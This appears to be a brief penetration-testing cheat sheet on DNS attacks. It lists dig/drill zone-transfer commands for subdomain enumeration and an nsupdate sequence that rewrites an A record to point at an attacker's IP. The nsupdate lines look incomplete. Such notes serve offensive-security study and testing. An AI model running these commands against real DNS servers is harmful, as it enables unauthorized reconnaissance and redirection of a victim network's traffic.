# DNS ## Subdomain Enumeration * Get all the info via ```sh dig @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr ``` * [subrake](https://github.com/hash3liZer/Subrake.git) ## Join a Domain * Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk ```sh nsupdate server update delete update add 1234 A $ATTACKER_IP send quit ``` * Check domain by querying the subdomain's A record via dig/drill/nslookup